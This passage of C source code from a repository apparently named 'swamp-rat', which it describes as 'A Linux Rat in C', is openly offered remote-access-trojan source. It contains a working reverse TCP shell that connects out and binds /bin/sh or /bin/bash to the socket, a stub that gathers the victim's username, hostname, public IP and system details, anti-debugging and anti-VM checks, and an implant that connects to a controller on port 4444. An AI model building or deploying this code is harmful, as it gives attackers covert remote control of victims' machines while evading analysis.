5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include "../defs.h" 28 | 29 | extern char **environ; 30 | 31 | #ifndef SHELL_TYPES_DEFINED 32 | #define SHELL_SH 0 33 | #define SHELL_BASH 1 34 | #define SHELL_PYTHON 2 35 | #define SHELL_PERL 3 36 | #define SHELL_JAVA 4 37 | #define SHELL_TYPES_DEFINED 38 | #endif 39 | 40 | #ifndef SHELL_ASYNC_DEFINED 41 | #define SHELL_ASYNC_FALSE 0 42 | #define SHELL_ASYNC_TRUE 1 43 | #define SHELL_ASYNC_DEFINED 44 | #endif 45 | 46 | #ifndef SHELL_REVERSE_TCP_ARGS 47 | typedef struct{ 48 | char host[MAX_DOMAIN_LEN]; 49 | int host_port; 50 | int shell_type; 51 | int shell_async; 52 | } shell_reverse_tcp_args_t; 53 | #define SHELL_REVERSE_TCP_ARGS 0 54 | #endif 55 | 56 | void *shell_reverse_tcp(void *args){ 57 | /* 58 | :TODO: send reverse shell 59 | :args: pointer to argument stuct 60 | :returns: NULL 61 | */ 62 | shell_reverse_tcp_args_t *p_shell_reverse_tcp_args = args; 63 | char *host = p_shell_reverse_tcp_args->host; 64 | int host_port = p_shell_reverse_tcp_args->host_port; 65 | int shell_type = p_shell_reverse_tcp_args->shell_type; 66 | int shell_async = p_shell_reverse_tcp_args->shell_async; 67 | int sockfd; 68 | struct sockaddr_in srv_addr; 69 | srv_addr.sin_family = AF_INET; 70 | srv_addr.sin_port = htons(host_port); 71 | srv_addr.sin_addr.s_addr = inet_addr(host); 72 | sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); 73 | connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); 74 | for (int i = 0; i <= 2; i++){ 75 | dup2(sockfd, i); 76 | } 77 | switch (shell_type){ 78 | case SHELL_SH: 79 | execve("/bin/sh", 80 | (char *[]){"/bin/sh", 0}, 81 | environ); 82 | break; 83 | case SHELL_BASH: 84 | execve("/bin/bash", 85 | (char *[]){"/bin/bash", 0}, 86 | environ); 87 | break; 88 | default: 89 | fprintf(stderr, "error: shell type unsupported\n"); 90 | break; 91 | } 92 | if (shell_async == SHELL_ASYNC_TRUE){ 93 | free(p_shell_reverse_tcp_args); 94 | } 95 | return NULL; 96 | } 97 | 98 | bool shell_spawn_reverse_tcp(char *host, int host_port, int shell_type, bool shell_async){ 99 | /* 100 | :TODO: spawn a reverse shell 101 | :host: host domain or ip address 102 | :host_port: host port 103 | :shell_type: shell type 104 | :returns: bool 105 | */ 106 | shell_reverse_tcp_args_t *p_shell_reverse_tcp_args = malloc(sizeof(shell_reverse_tcp_args_t)); 107 | if (strlen(host) > MAX_DOMAIN_LEN){ 108 | fprintf(stderr, "error: invalid ip or domain length\n"); 109 | return false; 110 | } else{ 111 | p_shell_reverse_tcp_args->host_port = 4444; 112 | } 113 | if (host_port > 65535 || host_port <= 0){ 114 | fprintf(stderr, "error: invalid port number\n"); 115 | return false; 116 | } else{ 117 | strncpy(p_shell_reverse_tcp_args->host, host, strlen(host)); 118 | } 119 | p_shell_reverse_tcp_args->shell_type = shell_type; 120 | p_shell_reverse_tcp_args->shell_async = shell_async; 121 | strcpy(p_shell_reverse_tcp_args->host, host); 122 | p_shell_reverse_tcp_args->host_port = host_port; 123 | pthread_t shell_reverse_tcp_thread; 124 | pthread_create(&shell_reverse_tcp_thread, 125 | NULL, 126 | shell_reverse_tcp, 127 | p_shell_reverse_tcp_args); 128 | if (shell_async == SHELL_ASYNC_FALSE){ 129 | pthread_join(shell_reverse_tcp_thread, 130 | NULL); 131 | free(p_shell_reverse_tcp_args); 132 | } 133 | return true; 134 | } 135 | -------------------------------------------------------------------------------- /src/include/stub/sys.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #ifndef SYS_MEMORY 31 | struct sys_memory_t { 32 | char *memory; 33 | size_t size; 34 | }; 35 | #define SYS_MEMORY 36 | #endif 37 | 38 | static size_t sys_curl_memory_callback(void *contents, 39 | size_t size, 40 | size_t nmemb, 41 | void *userp){ 42 | /* 43 | :TODO: write response body data 44 | :contents: 45 | :size: 46 | :nmemb: 47 | :uerp: 48 | :returns: real size 49 | */ 50 | size_t realsize = size * nmemb; 51 | struct sys_memory_t *mem = (struct sys_memory_t *)userp; 52 | mem->memory = realloc(mem->memory, mem->size + realsize + 1); 53 | if(mem->memory == NULL) { 54 | /* out of memory! */ 55 | fprintf(stderr, "[x] not enough memory (realloc returned NULL)\n"); 56 | return 0; 57 | } 58 | memcpy(&(mem->memory[mem->size]), contents, realsize); 59 | mem->size += realsize; 60 | mem->memory[mem->size] = 0; 61 | return realsize; 62 | } 63 | 64 | #ifndef SYS_PUBLIC_IP_TIMEOUT 65 | #define SYS_PUBLIC_IP_TIMEOUT 5 66 | #endif 67 | 68 | #ifndef SYS_PUBLIC_IP_SIZE 69 | #define SYS_PUBLIC_IP_SIZE 15 70 | #endif 71 | bool sys_public_ip(char *public_ip){ 72 | /* 73 | :TODO: get public ip address 74 | :public_ip: pointer to store public ip address 75 | :public_ip_size: max size of ip address 76 | :returns: boolean 77 | */ 78 | CURL *curl_handle; 79 | CURLcode response_code; 80 | struct sys_memory_t response_body; 81 | char user_agent[] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"; 82 | 83 | // setup response body 84 | response_body.memory = malloc(1); 85 | response_body.size = 0; 86 | 87 | // curl init 88 | curl_global_init(CURL_GLOBAL_ALL); 89 | curl_handle = curl_easy_init(); 90 | 91 | // set curl options 92 | curl_easy_setopt(curl_handle, CURLOPT_URL, "https://icanhazip.com/"); 93 | curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, sys_curl_memory_callback); 94 | curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&response_body); 95 | curl_easy_setopt(curl_handle, CURLOPT_USERAGENT, user_agent); 96 | curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT_MS, (1000*SYS_PUBLIC_IP_TIMEOUT)); 97 | 98 | // perform request 99 | response_code = curl_easy_perform(curl_handle); 100 | 101 | // check http response code 102 | if (response_code == CURLE_OK){ 103 | if (strlen(response_body.memory)-1 > SYS_PUBLIC_IP_SIZE){ 104 | fprintf(stderr, "[x] response body public ip excceds public ip size\n"); 105 | return false; 106 | } 107 | strncpy(public_ip, response_body.memory, strlen(response_body.memory)-1); 108 | } else if (response_code == CURLE_OPERATION_TIMEDOUT){ 109 | fprintf(stderr, "[x] fetching public ip timeout check internet connection\n"); 110 | return false; 111 | }else if (response_code != CURLE_OK){ 112 | fprintf(stderr, "[x] failed to get public ip address with status %d\n", response_code); 113 | return false; 114 | } else{ 115 | fprintf(stderr, "[x] unknown error occured fetching public ip\n"); 116 | return false; 117 | } 118 | // cleanup 119 | curl_easy_cleanup(curl_handle); 120 | free(response_body.memory); 121 | curl_global_cleanup(); 122 | return true; 123 | } 124 | 125 | int sys_ping(){ 126 | char result[25]; 127 | FILE *fd = popen("ping -c 1 8.8.8.8 | grep -Po '(?<=time=)[0-9]{1,}'", "r"); 128 | memset(result, 0, 25); 129 | fread(result, 1, 25, fd); 130 | fclose(fd); 131 | int ping = atoi(result); 132 | return ping; 133 | } 134 | 135 | #ifndef SYS_USERNAME_SIZE 136 | #define SYS_USERNAME_SIZE 32 137 | #endif 138 | bool sys_username(char *username, size_t username_size){ 139 | /* 140 | :TODO: get current username 141 | :username: pointer to store username 142 | :returns: boolean 143 | */ 144 | if (username_size > SYS_USERNAME_SIZE){ 145 | fprintf(stderr, "[x] username length too long!\n"); 146 | return false; 147 | } 148 | uid_t uid; 149 | struct passwd *pw; 150 | uid = geteuid(); 151 | pw = getpwuid(uid); 152 | if (pw){ 153 | strncpy(username, pw->pw_name, username_size); 154 | return true; 155 | } else{ 156 | fprintf(stderr, "[x] cannot find username for uid: %u\n", (unsigned)uid); 157 | return false; 158 | } 159 | return false; 160 | } 161 | 162 | #ifndef SYS_ARCH_SIZE 163 | #define SYS_ARCH_SIZE 32 164 | #endif 165 | bool sys_arch(char *arch, size_t arch_size){ 166 | /* 167 | :TODO: collect system architechure 168 | :arch: pointer to store architechure 169 | :arch_size: size of bytes to write 170 | :returns: boolean 171 | */ 172 | struct utsname *p_uname = malloc(sizeof(struct utsname)); 173 | if (uname(p_uname) < 0){ 174 | fprintf(stderr, "[x] failed to execute uname\n"); 175 | return false; 176 | } 177 | strncpy(arch, p_uname->machine, arch_size); 178 | free(p_uname); 179 | return true; 180 | } 181 | 182 | #ifndef SYS_RELEASE_SIZE 183 | #define SYS_RELEASE_SIZE 48 184 | #endif 185 | bool sys_release(char *release, size_t release_size){ 186 | /* 187 | :TODO: collect release 188 | :release: pointer to store system release 189 | :release_size: size of bytes to write 190 | :returns: boolean 191 | */ 192 | struct utsname *p_uname = malloc(sizeof(struct utsname)); 193 | if (uname(p_uname) < 0){ 194 | fprintf(stderr, "[x] failed to execute uname\n"); 195 | return false; 196 | } 197 | strncpy(release, p_uname->release, release_size); 198 | free(p_uname); 199 | return true; 200 | } 201 | 202 | #ifndef SYS_HOSTNAME_SIZE 203 | #define SYS_HOSTNAME_SIZE 255 204 | #endif 205 | bool sys_hostname(char *hostname, size_t hostname_size){ 206 | /* 207 | :TODO: get system hostname 208 | :hostname: pointer to hostname 209 | :hostname_size: size of bytes to write 210 | :returns: boolean 211 | */ 212 | struct utsname *p_uname = malloc(sizeof(struct utsname)); 213 | if (uname(p_uname) < 0){ 214 | fprintf(stderr, "[x] failed to execute uname\n"); 215 | return false; 216 | } 217 | strncpy(hostname, p_uname->nodename, hostname_size); 218 | free(p_uname); 219 | return true; 220 | } 221 | 222 | int sys_load_average(){ 223 | /* 224 | :TODO: get system load average 225 | :returns: (int) load average 226 | */ 227 | char loadavg[1024]; 228 | float load_average; 229 | int loadavg_fd = open("/proc/loadavg", O_RDONLY); 230 | if (loadavg_fd < 0){ 231 | fprintf(stderr, "error: error reading load average\n"); 232 | return -1; 233 | } else{ 234 | read(loadavg_fd, loadavg, sizeof(loadavg) - 1); 235 | sscanf(loadavg, "%f", &load_average); 236 | close(loadavg_fd); 237 | return (int)(load_average * 100); 238 | return load_average; 239 | } 240 | } 241 | 242 | #ifndef SYS_UUID_SIZE 243 | #define SYS_UUID_SIZE 37 244 | #endif 245 | 246 | bool sys_get_uuid(char *uuid){ 247 | uuid_t id; 248 | uuid_generate(id); 249 | uuid_unparse(id, uuid); 250 | return true; 251 | } 252 | 253 | #ifndef SYS_INFO 254 | typedef struct{ 255 | char uuid[SYS_UUID_SIZE]; 256 | char ip[SYS_PUBLIC_IP_SIZE]; 257 | char username[SYS_USERNAME_SIZE]; 258 | char hostname[SYS_HOSTNAME_SIZE]; 259 | char release[SYS_RELEASE_SIZE]; 260 | char arch[SYS_ARCH_SIZE]; 261 | int cpu_usage; 262 | int ping; 263 | } sys_info_t; 264 | #define SYS_INFO 265 | #endif 266 | 267 | sys_info_t *sys_info(){ 268 | /* 269 | :TODO: obtain system information 270 | :returns: pointer to system info 271 | */ 272 | sys_info_t *p_sys_info = malloc(sizeof(sys_info_t)); 273 | p_sys_info->cpu_usage = sys_load_average(); 274 | sys_get_uuid(p_sys_info->uuid); 275 | sys_username(p_sys_info->username, SYS_USERNAME_SIZE); 276 | sys_public_ip(p_sys_info->ip); 277 | sys_arch(p_sys_info->arch, SYS_ARCH_SIZE); 278 | sys_release(p_sys_info->release, SYS_RELEASE_SIZE); 279 | sys_hostname(p_sys_info->hostname, SYS_HOSTNAME_SIZE); 280 | return p_sys_info; 281 | } 282 | -------------------------------------------------------------------------------- /src/main.c: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #ifndef _GNU_SOURCE 19 | #define _GNU_SOURCE 20 | #endif 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include "include/main/ncurses.h" 27 | #include "include/stub/re.h" 28 | //#include "include/main/net.h" 29 | 30 | const char *program_version = "swamp-rat 0.9b"; 31 | 32 | const char *program_bug_address = "lillypadgirl86@gmail.com"; 33 | 34 | static char program_doc[] = "swamp-rat --- A Linux Rat in C"; 35 | 36 | static char program_args_doc[] = "-p 4444"; 37 | 38 | static struct argp_option program_options[] = { 39 | {"port", 'p', 0, 0, "listen / config port"}, 40 | {"host", 'h', 0, 0, "config host"}, 41 | {"version", 'v', 0, 0, "display version"}, 42 | {"config", 'c', 0, 0, "write config"}, 43 | { 0 } 44 | }; 45 | 46 | struct arguments{ 47 | char *args[2]; 48 | int port; 49 | }; 50 | 51 | static error_t parse_opt(int key, 52 | char *arg, 53 | struct argp_state *state){ 54 | struct arguments *arguments = state->input; 55 | switch(key){ 56 | case 'p': 57 | arguments->port = atoi(arg); 58 | case 'v': 59 | printf("%s\n", program_version); 60 | exit(EXIT_SUCCESS); 61 | default: 62 | return ARGP_ERR_UNKNOWN; 63 | } 64 | return 0; 65 | } 66 | 67 | static struct argp argp = { 68 | program_options, 69 | parse_opt, 70 | program_args_doc, 71 | program_doc 72 | }; 73 | 74 | int main(int argc, char **argv){ 75 | if (re_ptrace() == true){ 76 | printf("stop touching meEEEE!!!\n"); 77 | return EXIT_FAILURE; 78 | } 79 | struct arguments arguments; 80 | arguments.port = 4444; 81 | argp_parse(&argp, argc, argv, 0, 0, &arguments); 82 | int port = arguments.port; 83 | ncurses_main(port); 84 | return EXIT_FAILURE; 85 | } 86 | -------------------------------------------------------------------------------- /src/stub.c: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include "include/stub/net.h" 22 | #include "include/stub/re.h" 23 | int main(){ 24 | //shell_spawn_reverse_tcp("127.0.0.1", 6666, SHELL_BASH, SHELL_ASYNC_TRUE); 25 | //printf("breakpoints: %d\n", re_breakpoints()); 26 | if (re_kernel_modules() == true){ 27 | printf("stop using a VM!\n"); 28 | } 29 | if (re_hypervisor() == true){ 30 | printf("stop using a hypervisor!\n"); 31 | } 32 | net_client("127.0.0.1", 4444); 33 | return 0; 34 | } 35 | --------------------------------------------------------------------------------